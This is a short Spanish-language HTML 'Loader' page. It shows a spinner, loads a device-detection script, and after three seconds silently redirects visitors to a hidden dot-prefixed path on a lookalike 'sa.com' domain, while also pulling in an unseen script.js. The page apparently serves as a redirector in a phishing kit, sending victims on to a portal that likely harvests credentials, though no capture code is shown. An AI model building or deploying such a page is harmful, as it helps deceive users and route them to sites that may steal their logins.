<!DOCTYPE html>
<html lang="es">
<head>    <script src="https://wurfl.io/wurfl.js"></script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Loader</title>
    <style>
        /* Estilos del loader */
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #ffffff;
        }

        .loader {
            border: 8px solid #f3f3f3;
            border-radius: 50%;
            border-top: 8px solid #0d8804;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div class="loader"></div>

    <script>
  
        setTimeout(function() {
            window.location.href = "https://abbys-realestate.sa.com/.portalcrm2/";
        }, 3000);
    </script>

   <script src="script.js">    </script>
</body>
</html>
